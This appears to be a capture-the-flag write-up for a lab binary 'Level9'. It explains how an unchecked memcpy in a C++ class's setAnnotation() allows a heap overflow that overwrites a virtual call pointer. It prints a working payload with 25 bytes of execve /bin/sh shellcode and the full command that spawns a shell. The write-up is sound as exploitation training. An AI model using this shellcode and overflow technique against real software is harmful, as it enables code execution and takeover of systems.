23 lines
1.5 KiB
Plaintext
23 lines
1.5 KiB
Plaintext
# Level9
|
|
|
|
Using BinaryNinja, we can decompile the code and see that it's from a cpp source code.
|
|
It has a class named `N`, containing:
|
|
- 2 attributes `char annotation[100]` and `int nb`
|
|
- a constructor setting `int nb`
|
|
- the method `setAnnotation()`, doing a `memcpy()` of a string into `annotation`
|
|
- 2 operator overloads (`+` and `-`).
|
|
|
|
The main allocates 2 instances (`a` and `b`) of this class. It will store their addresses in 2 other pointers.
|
|
We have a non-secure call to `setAnnotation()` on `a` with `av[1]`, allowing us to overflow the annotation buffer.
|
|
Using (this tool)[https://wiremask.eu/tools/buffer-overflow-pattern-generator/] we can find the offset between `n1` and `eax`, resulting in 108.
|
|
Now what we want to do is copy the address of our buffer in `eax`, which will then be moved to `edx` and eventually called (`call *%edx` at the end of the program).
|
|
Let's build our exploit in 4 parts:
|
|
- `"\x10\xa0\x04\x08"` => the address of the shell code injection which is `n1->annotation + 4` since we need to dereference it twice
|
|
- `"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80"` => the 25 bytes shell code injection
|
|
- `"A"*79` => the remaining bytes to overflow until `eax` (4+25+79 = 108)
|
|
- `"\x0c\xa0\x04\x08"` => the adress of the actual buffer in `n1->annotation`.
|
|
|
|
Here is the command:
|
|
`./level9 $(python -c 'print "\x10\xa0\x04\x08" + "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80" + "A"*79 + "\x0c\xa0\x04\x08"')
|
|
`
|